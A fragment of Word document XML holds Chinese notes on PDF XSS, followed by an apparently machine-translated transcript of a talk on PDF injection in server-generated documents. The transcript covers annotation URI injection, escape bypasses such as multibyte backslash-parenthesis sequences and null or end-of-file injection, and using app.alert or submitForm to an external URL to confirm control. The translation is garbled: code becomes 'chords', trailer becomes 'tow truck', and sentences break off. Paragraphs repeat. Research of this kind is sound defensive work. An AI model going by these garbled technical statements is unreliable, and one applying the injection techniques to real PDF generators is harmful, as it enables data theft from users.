    </w:p>
    <w:p w14:paraId="26ED45B2" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C31D1D5" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66437F92" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0054C4F7" w14:textId="77777777" w:rsidR="00870DD3" w:rsidRDefault="00870DD3" w:rsidP="009F55E8">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DCA43E" w14:textId="77777777" w:rsidR="001512E3" w:rsidRDefault="001512E3" w:rsidP="0082371F">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001512E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF XSS（Portable Document Format Cross-Site Scripting）是一种利用PDF文件中的漏洞实现的跨站点脚本攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC6C8C" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="001512E3" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001512E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF文件是一种常见的电子文档格式，其中包含了丰富的内容，包括图像、文本、链接等等。攻击者可以通过在PDF文件中插入恶意代码，例如JavaScript脚本，来实现PDF XSS攻击。</w:t>
      </w:r>
      <w:r w:rsidR="0080128D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么是PDF XSS漏洞？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCFEF0" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PDF XSS漏洞是指攻击者通过在PDF文件中插入恶意代码，从而在用户打开PDF文件时执行恶意操作的一种安全漏洞。下面是关于PDF XSS漏洞的总结和过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D3359" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A17C868" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF文件的结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7006E9" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF文件是一种常见的文档格式，它由一系列对象组成，包括字体、图像、页面内容等。PDF文件使用一种称为“Portable Document Format”的标准来描述文档的结构和内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5FD45" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F923E2C" w14:textId="77777777" w:rsidR="0080128D" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS漏洞的原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9D69A" w14:textId="6E7F4B26" w:rsidR="001512E3" w:rsidRDefault="0080128D" w:rsidP="0080128D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）漏洞是一种常见的Web安全漏洞，攻击者通过在Web页面中插入恶意脚本代码，从而在用户浏览页面时执行恶意操作。PDF XSS漏洞利用了PDF文件的结构和内容，将恶意脚本代码嵌入到PDF文件中，当用户打开PDF文件时，恶意脚本代码会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6A80F" w14:textId="77777777" w:rsidR="001512E3" w:rsidRDefault="001512E3" w:rsidP="0082371F">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D79FC8" w14:textId="1061B356" w:rsidR="00776A6B" w:rsidRDefault="00D87DFA" w:rsidP="0082371F">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端⽣成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PDF 的应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>⽤⽆处不在，例如电⼦客票、收据、登机牌、发票、⼯</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资单等等</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此，⽤⼾输⼊很容易被注⼊到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>⽂档中。最容易被注⼊的⽬标是⽂本流或注释，因为这些对象允许</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发者嵌</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>⼊⽤括号</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>括</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>起来的⽂本或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URI。</w:t>
      </w:r>
      <w:r w:rsidR="00923C0A" w:rsidRPr="00923C0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意用户可以注入括号，那么他们就可以注入  PDF  代码，并有可能插入他们自己的有害  PDF  对象或操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333464D" w14:textId="5DEC9D1E" w:rsidR="009912C5" w:rsidRDefault="009912C5" w:rsidP="009912C5">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF XSS（Portable Document Format Cross-Site Scripting）是一种利用PDF文件中的漏洞实现的跨站点脚本攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BF6B6" w14:textId="1AFD2383" w:rsidR="009912C5" w:rsidRDefault="009912C5" w:rsidP="009912C5">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF文件是一种常见的电子文档格式，其中包含了丰富的内容，包括图像、文本、链接等等。攻击者可以通过在PDF文件中插入恶意代码，例如JavaScript脚本，来实现PDF XSS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D2D4A9" w14:textId="62144EAD" w:rsidR="009912C5" w:rsidRDefault="009912C5" w:rsidP="009912C5">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF XSS攻击可以在用户打开PDF文件时触发，当用户点击恶意链接或执行特定操作时，恶意代码就会被执行。攻击者可以利用PDF XSS攻击来窃取用户敏感信息、篡改网站内容、实施网络钓鱼等行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE7194" w14:textId="2F37A5D2" w:rsidR="00821DF1" w:rsidRDefault="00821DF1" w:rsidP="00821DF1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦确定可以影响  PDF  的结构，就需要构建一个注入脚本来验证你对其中一部分的控制。这可以通过在  PDF  JavaScript  中调用  `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1)`  来实现，也可以使用  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submitForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  操作/函数向外部  URL  发送  POST  请求。这</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于盲注场景</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC3157" w14:textId="77777777" w:rsidR="00976019" w:rsidRPr="00976019" w:rsidRDefault="00976019" w:rsidP="00976019">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976019">
        <w:t>大家好，欢迎来到本次关于PDF文件XSS漏洞利用的便携式数据泄露演讲。本次</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>演讲我将……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>教你如何在打开或关闭 PDF 文件时，对 PDF 文档跟踪进行加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>即使从文件系统加载，也会泄露内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 Acrobat 和 Chrome 浏览器中都无法识别未知 PDF 文件，所有这些技术都使用了 PDF 注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我的同事詹姆斯·凯特尔当时正在观看一个关于PDF的黑帽大会演讲，他正在查看PDF文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>他输入代码后心想，这看起来像是可以注射的，然后他就回到了办公室，我们当时就……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们讨论了PDF演示文稿，他对我说</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>PDF代码完全可以注入，我的回答是我认为这是不可能的，你不会这么做。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果了解 PDF 的结构，交叉引用表将无法正常工作，对象将无法链接。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我实在想不明白这怎么可能，但这并没有阻止我，我接着开始测试PDF注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>首先，我将介绍注入理论，讲解如何在 PDF 文件中获取用户输入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>为什么不能随意插入内容？</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>我会谈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>谈我使用的方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我将测试各种库，并讨论我利用过的两个库。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>讨论如何利用 Chrome 和 Acrobat 中的注入漏洞，以及一种有效的混合注入方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>两边我都会先说防守，这样就剩下五分钟时间了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>问题在于服务器端 PDF 生成。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>到处都有，发票、收据、电子客票，甚至订金单、登机牌上都有。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>列表无穷无尽，因此有很多机会可以在 PDF 文档中获取用户输入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>例如，如果你把PDF注入点想象成XSS攻击，并想象一下你的XSS攻击……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果漏洞在括号内执行，并且在函数调用中执行，那么这就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这种情况与 PDF 注入类似，就像 JavaScript 注入一样，你需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>为了确保语法有效，你的注入语句和现有的和弦都必须有效。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这意味着注射前后都需要修复导线。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注入过程，以及PDF的结构，所以我们有</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">我们有 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>xrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 表和拖车，这些对象允许您定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>图像和文本流中，交叉引用表指向文档中的每个图像。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>而尾部则位于文档末尾，并指定根目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>对象，这就是 PDF 代码中对象的样子。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以这是第一个对象，其修订版本为零。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后是对象起始的关键字，这是一个字典，所以是字典。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>从这些字符开始，我们这里还有一个字典键，在本例中是页。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>页数指</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>的是文档中的页数，你会注意到两个空格和零。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>空格是 PDF 代码中的引用，所以引用的作用是允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你需要链接到 PDF 文档中的其他对象，这样才能获取到这个。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>比如，转到对象编号 2 修订编号 0 并链接它。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>该对象将定义页面上的页数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>字典到此结束，所以这只是对pdf对象的基本介绍。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>虽然结构清晰，但它会提供足够的信息让你理解本次演讲的其余部分。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这是交叉引用表，所以交叉引用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>表总是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve">以 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>xref</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 关键字开头。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>呃，PDF规范规定，开头应该有一个空白对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>具体的修订号，所以这个版本是免费的，后面的 f 表示的就是这个。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 PDF 文档中未使用的对象是您拥有的第一个对象，</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这个数字指的是该对象在文档中出现的位置，所以在本例中是 10。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">它显示第一个对象位于文档的第 10 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>位置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>xref</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 关键字指示交叉引用表的起始位置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，在这种情况下是 430，这告诉了你客户在哪里</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>XRF表格开始了，所以我想先简单介绍一下。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>关于PDF暂停方式的信息，这里提供一个超概览。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>为了让你们了解我们的注入发生在哪里，以便读取起始交叉引用并指向……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>交叉引用表，交叉引用表列出所有对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>因此，PDF客户端将查看所有XRF表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>收集所有物品，如果你要进行注射，那很可能……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>发生在对象内部，因此我们的有效载荷将在一个对象内部执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>将在对象执行完毕后执行，然后文档才会渲染。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们有文本流，文本流中还可以添加注释，你可以自定义注释。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这里使用括号</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>括</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>起来的文本，所以我们有一个对象，它是</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>第四点，它有一个长度值，字典键为 length，并且</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>流表明</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>它是一个流。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>B 队代表开始文本，我们有字体和字号。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>最后，我们还要说明注射部位，所以在括号内你可以……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>请定义屏幕上将显示的文本，以便添加一些结尾语。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后你可以在括号里插入自己的和弦，但是这里存在一些问题，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果注入代码时对象长度不同，则该对象将无法渲染。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你需要了解pdf文件的相关知识才能将其链接到其他对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我在各种库上都尝试过这种方法，但都未能成功利用文本流，这是因为……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>原因有二：一是括号被转义了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>图书馆正确地……你无法注入任何和弦</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>因为那样会破坏PDF的结构，所以我没能成功地利用文本。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然而，我在流中遇到了注解。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注释功能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>非常</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>棒，它允许你在文档中的任何位置指定链接，这样你</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>创建一个新的注释，给它添加一个矩形区域，点击该区域，然后添加边框或其他样式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">您可以指定一个操作，该操作可以具有 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 属性或</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>URI 字典键，括号中可以指定 URI，以便我们进行注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>这里可能会发生这种情况，而且对于PDF注入攻击来说，这看起来更有希望，因为我们没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我们需要了解 PDF 的内容，只需插入另一个注释即可，这不会影响其长度。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>因此，将该物体注入内部看起来更有希望。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注释，所以我当时正在测试各种库。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我想我做到第八步的时候，总结出了以下方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>识别构造并加以利用，所以首先你需要识别你是否能够做到这一点</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>能否使用反斜杠来转义库添加的转义符？我试过了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>多字节字符，例如我使用 5c 29，它是</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>反斜杠和右括号，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>库可能</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>会将这些多字符转换为</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>单反字符，允许您转义注释</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我尝试让 ASCII 值超出允许的最大值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>ASCII 字符可能会溢出到其他字符，从而绕过检查。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我尝试通过注入空值和注入 Endeavour 文件标记来引发解析错误。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>当我确定图书馆是……之后，我也发表了评论。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我当时觉得这个攻击很容易被利用，所以我尝试构建攻击方案，所以有两种构建方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>攻击时，如果您有一个非盲目的 PDF 文件，则可以调用 alert 函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以你遇到了反射型 PDF 注入漏洞，因此可以使用警报功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
